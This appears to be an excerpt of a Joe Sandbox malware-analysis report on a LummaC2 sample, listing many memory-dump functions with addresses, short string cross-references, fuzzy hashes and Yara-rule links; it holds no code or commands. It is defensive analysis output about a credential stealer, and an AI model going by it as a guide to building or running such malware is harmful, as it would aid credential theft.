{rsp, xrefs: 002FE750
lohi, xrefs: 002FE624, 002FE6C5

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: lohi${rsp
API String ID: 2994545307-2839643115
Opcode ID: 35df8e04d6e99d06d0b197f43354145ef279dea739450422e6dacf6b22a57a56
Instruction ID: 86dbc901f3ba822ce4e1602fcf28526875e2598c8fa91ed82861f070f9768db0
Opcode Fuzzy Hash: 35df8e04d6e99d06d0b197f43354145ef279dea739450422e6dacf6b22a57a56
Instruction Fuzzy Hash: BD9177716183494FD725DE28C880A7BF7E6ABD5348F1AC83CE5D687261DA30EC15CB92

Function 002C4310 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 002C4701
), xrefs: 002C438B

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 7933ad490a446b1e723a8770ae60ecace3b506f0e37e2bbab90ff018bc21f500
Instruction ID: 61269225d60e95b76295e548165e753b893b58ca201a249a9739dcd5254635b7
Opcode Fuzzy Hash: 7933ad490a446b1e723a8770ae60ecace3b506f0e37e2bbab90ff018bc21f500
Instruction Fuzzy Hash: E1D1DEB19183449FD720DF18C851B5BBBE4AF94304F148A2DF9999B382D775E928CB82

Function 002D7B75 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

"#, xrefs: 002D7D10
s}, xrefs: 002D7C34

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: "#$s}
API String ID: 0-1697270657
Opcode ID: 616e57ca9157374b0e30b44e709523c7d91e2e80ecc77837be034b19372a9fa8
Instruction ID: 6f50105abd716e8db2f44f8cc8c040840ea9d47428c02cadfeefb065005ba94a
Opcode Fuzzy Hash: 616e57ca9157374b0e30b44e709523c7d91e2e80ecc77837be034b19372a9fa8
Instruction Fuzzy Hash: D1B189B01183818BD775CF24C4917EBBBE1EF96314F54892DE4C98B391EB398945CB92

Function 002EC289 Relevance: 2.8, Strings: 2, Instructions: 309COMMON

Download Yara Rule

Strings

u, xrefs: 002EC364
@a, xrefs: 002EC2AF

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$u
API String ID: 0-583156259
Opcode ID: ddec2d656bf660f6fe6899dafd5bf8b95a58bb6162d1edb01932bfcf94d170c7
Instruction ID: 98707b61c863cad93b94fc4fca9bb6699fe4fcce10d63d03793e1f56331f33b8
Opcode Fuzzy Hash: ddec2d656bf660f6fe6899dafd5bf8b95a58bb6162d1edb01932bfcf94d170c7
Instruction Fuzzy Hash: 0D81E37051C3C18FD729CF3A84607ABBBD1AFA6304F6889ADE4D997282D7358506CB52

Function 002D683F Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

gfff, xrefs: 002D6A5E
7, xrefs: 002D6991

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 59f1a8502a00718b29ff217161edbc610f5f4f36417cbfdf84d0d4be4e8a2afe
Instruction ID: 17584e0f11a1caac4bc3b7b9baa86534722609c53003ad163dbd31d8a553b4e4
Opcode Fuzzy Hash: 59f1a8502a00718b29ff217161edbc610f5f4f36417cbfdf84d0d4be4e8a2afe
Instruction Fuzzy Hash: 40917973A242114FD718CF28CC567AB77E6ABC4324F19C63ED495DB385EA789C068B81

Function 002DAD81 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

x3,-, xrefs: 002DAE6E
CM, xrefs: 002DAF47

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: CM$x3,-
API String ID: 0-963954796
Opcode ID: ad3c33308d8e1f0e2b719af418d3be17009122f841f0dd258316dba4b26c5121
Instruction ID: d21b895719825ca2aced2b8a377167ede93b976f3b0bcc5ab1772ceb6d647243
Opcode Fuzzy Hash: ad3c33308d8e1f0e2b719af418d3be17009122f841f0dd258316dba4b26c5121
Instruction Fuzzy Hash: B89151B49117009FC7249F39C596A16BFF0FF0A710B448A5EE4D68BB95D330E816CB96

Function 002DD172 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

[U, xrefs: 002DD210
_8Y, xrefs: 002DD208

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 6e7ef18f98c35d9e51fb6c689c99f1c1cf1cae951a6640caaff79737c5ab7b7e
Instruction ID: 3addbfc4b577778bd34111845c180972b446d82ce8d81d8a74db023a9796ea26
Opcode Fuzzy Hash: 6e7ef18f98c35d9e51fb6c689c99f1c1cf1cae951a6640caaff79737c5ab7b7e
Instruction Fuzzy Hash: 806101B069C3508BD700DF24D85266BB7F1EF92304F18896DE9C48B391E73ADA16CB56

Function 002DD189 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

[U, xrefs: 002DD210
_8Y, xrefs: 002DD208

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: fcf80c0330bed5b7a66f4777f36e7428895f33a01224984f36cf39a2adfd8503
Instruction ID: 837b993de12391e0bc6ca77349ed3e36de3eda27006bf2d9c5f20c5212271125
Opcode Fuzzy Hash: fcf80c0330bed5b7a66f4777f36e7428895f33a01224984f36cf39a2adfd8503
Instruction Fuzzy Hash: 2E5121B069C350CBD700DF24C85266BB7F1EFA2304F18896DE9848B391E73AD916CB56

Function 002CF2A0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

], xrefs: 002CF3BF
J, xrefs: 002CF424

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: J$]
API String ID: 0-1719541227
Opcode ID: 1871c76ddb3b95a5a6c952ffc5dc464795306f42303583ca146c02960dd0d15a
Instruction ID: 4160533a7d8312514a040fef6664075f192468521a799a7db7282858a8c6eadd
Opcode Fuzzy Hash: 1871c76ddb3b95a5a6c952ffc5dc464795306f42303583ca146c02960dd0d15a
Instruction Fuzzy Hash: 6A614D33A2C7908BD3644A78888179FFBD29BD6324F194B7ED8E4D73C2D57888158742

Function 002E3C60 Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

b"}, xrefs: 002E3CED
Z[, xrefs: 002E3CE6

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: Z[$b"}
API String ID: 0-914116730
Opcode ID: 3b525564b4e6806ff965d7cb60344f212a478ce70d6ee0a7b2f8bf5f247dd997
Instruction ID: e9d2795c983ff9c856caf21448d2b81a1d72977d2530bcaa22da808e022e6e9f
Opcode Fuzzy Hash: 3b525564b4e6806ff965d7cb60344f212a478ce70d6ee0a7b2f8bf5f247dd997
Instruction Fuzzy Hash: 87611376A583409FE714CF69D88075FBAE6EBC5704F09C93DE9945B381C7B488058B92

Function 002CE465 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

{L, xrefs: 002CE4BD
c, xrefs: 002CE46F

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: c${L
API String ID: 0-2217919563
Opcode ID: d4ea797b57ea867905a82c863fad690a53dd09f2f9fab0f9aa01825b37de7cae
Instruction ID: 3106f990456775d448a7dfa2e61cc7816d861a7e9103d8de5883b0a9179ec8d4
Opcode Fuzzy Hash: d4ea797b57ea867905a82c863fad690a53dd09f2f9fab0f9aa01825b37de7cae
Instruction Fuzzy Hash: A5512472A1C3D04BE725CB24C8917DF7BE3EBD5344F194A3CC8C597282E67559028742

Function 002E90B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

dV3T, xrefs: 002E90DA
5B3@, xrefs: 002E90C2

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 5B3@$dV3T
API String ID: 0-261990991
Opcode ID: 0f65e42ca19845bee20c4644875b882936327b0cf911024c12ea499841f9c09d
Instruction ID: 84b6a789720eb1d70469548293757fbe749d3030a6c2534f0a2e7fdecfc1804e
Opcode Fuzzy Hash: 0f65e42ca19845bee20c4644875b882936327b0cf911024c12ea499841f9c09d
Instruction Fuzzy Hash: D231EBB16483948FD3118F2A888071FFBF6BBD6B04F149A2CE5D59B295C7B4C9428B06

Function 002D4A50 Relevance: 2.4, Strings: 1, Instructions: 1153COMMON

Download Yara Rule

Strings

D]+\, xrefs: 002D5160

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 5bed4fb478fa4aea9c4396c38893353adc1677244ab028c145bde94c064a6591
Instruction ID: 95a7c011b337c30e3aa0e693888cac1c6f59bc8d03ffc5b51ac281d9932aa25e
Opcode Fuzzy Hash: 5bed4fb478fa4aea9c4396c38893353adc1677244ab028c145bde94c064a6591
Instruction Fuzzy Hash: 8B628535A29302DFD7149F24E8A2B3BB3A5FF95311F04492EE88657391EB719D21CB42

Function 002DF700 Relevance: 1.8, Strings: 1, Instructions: 589COMMON

Download Yara Rule

Strings

2., xrefs: 002DF711

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 2.
API String ID: 0-3585760874
Opcode ID: f44b9a013712032c44a39f161c069fcf4632627da5d161dc9e3b38b451ce293a
Instruction ID: 9128e6cf38a064c8e06cf7240220f91d0919aa431147ed76ce85e6a683a4786d
Opcode Fuzzy Hash: f44b9a013712032c44a39f161c069fcf4632627da5d161dc9e3b38b451ce293a
Instruction Fuzzy Hash: 8F525BB0619B818ED326CB3C8815797BFD5AB5A324F084A5DE0EF873D2C7756101CB66

Function 002E66C0 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

:, xrefs: 002E67D6

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-3726092367
Opcode ID: f3e6acff51d112683a7010b7f2c0aeb89c19e8611ffbd7c4e280137ed04b6f57
Instruction ID: 3dc32bbfda5a713152d65c567abd54b60bf75faecc0106efcdb2b037c2ad1701
Opcode Fuzzy Hash: f3e6acff51d112683a7010b7f2c0aeb89c19e8611ffbd7c4e280137ed04b6f57
Instruction Fuzzy Hash: 34F168B16283818FC7148F29885522BBBE1EFD5314F08897EE5D58B382D779D815CF92

Function 002EA3B0 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

", xrefs: 002EA6C1

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: e2b00373cef3fd65b8c420d04a313ff3f859b4b6803b1402714b41e50628ab8b
Instruction ID: 12085ed97eb1ee2d812bbd91d3c342a66e13e918e1c050299cb42efd8d2db884
Opcode Fuzzy Hash: e2b00373cef3fd65b8c420d04a313ff3f859b4b6803b1402714b41e50628ab8b
Instruction Fuzzy Hash: FFF13B71A583824FC714CF26C49162BBBE5AFC5300F59C95DE89987382D634EC15CB93

Function 002E7A40 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

2z., xrefs: 002E7A26

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 2z.
API String ID: 0-3517477983
Opcode ID: 3b428bd7e489562cf3f169d367bd40f415201cc273e92986ebb2331e5087af8e
Instruction ID: c8a0dcf2a47ff9017a844ddc9f8df6af9ec42ccc9af3ec618cceed4676abad40
Opcode Fuzzy Hash: 3b428bd7e489562cf3f169d367bd40f415201cc273e92986ebb2331e5087af8e
Instruction Fuzzy Hash: 8CB13631A15682CFDB15CF29D8A076EB7B7AF8A324F2942ADE4515B3D1CB319D11CB40

Function 002F68A0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

Y, xrefs: 002F68AF

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: ffc3def37b5e5dda7f7de7115ea3ee27a1ef66f28c91f87d91f317d4d800f5d3
Instruction ID: 290c832bc927b5b24dc09afc17107b6ca4171407bbfcb13b91752fb5a698e491
Opcode Fuzzy Hash: ffc3def37b5e5dda7f7de7115ea3ee27a1ef66f28c91f87d91f317d4d800f5d3
Instruction Fuzzy Hash: C4A1263111C7998FC3118B38849427AFFD2DBD63A8F188A2DE2D2972D2D6B58959C742

Function 002DDC50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

8, xrefs: 002DDDA6

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 74bd235bd16ee50422c366ba55eedf58fcea1d91e0791d96e90f8397113fcdeb
Instruction ID: 4934b4ebcf7e0c0ef378386959a6f0dd796498f8c1b5c3880218357546f99558
Opcode Fuzzy Hash: 74bd235bd16ee50422c366ba55eedf58fcea1d91e0791d96e90f8397113fcdeb
Instruction Fuzzy Hash: 2E712633A69D9147D729893C4C213AA7E934BE2330F2DC76FE5B68B3E5D6A94C118340

Function 002EFEC0 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

8, xrefs: 002EFFF9

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 780808ca6a6f6d17bd314bece64f08739d8b4008a0151f186eb8aef1cbfc5736
Instruction ID: 83097f233489e836826f2bdeb745d0330fa39b082ae7090a8a649de1b6be2809
Opcode Fuzzy Hash: 780808ca6a6f6d17bd314bece64f08739d8b4008a0151f186eb8aef1cbfc5736
Instruction Fuzzy Hash: 6271092766A9D147D3298A3D4C613B6BA834BD3330F2DC77DE5F98B3E2D56948158340

Function 002DA800 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

_, xrefs: 002DA8EC

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 1a000b8be6e51fe85f0180f0e6804429770bc07c4c9d44f44a7f8fe9ad870fb6
Instruction ID: 467821a078a99556e8b0315fb1101eed0d630610b785a9ec231ff5fc0d2e5d7c
Opcode Fuzzy Hash: 1a000b8be6e51fe85f0180f0e6804429770bc07c4c9d44f44a7f8fe9ad870fb6
Instruction Fuzzy Hash: 3561EB556152900ACB2DDF7484B3737BAE69F44308F2892EEC965CFAD7E638C5038786

Function 002DA7FD Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

_, xrefs: 002DA8EC

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
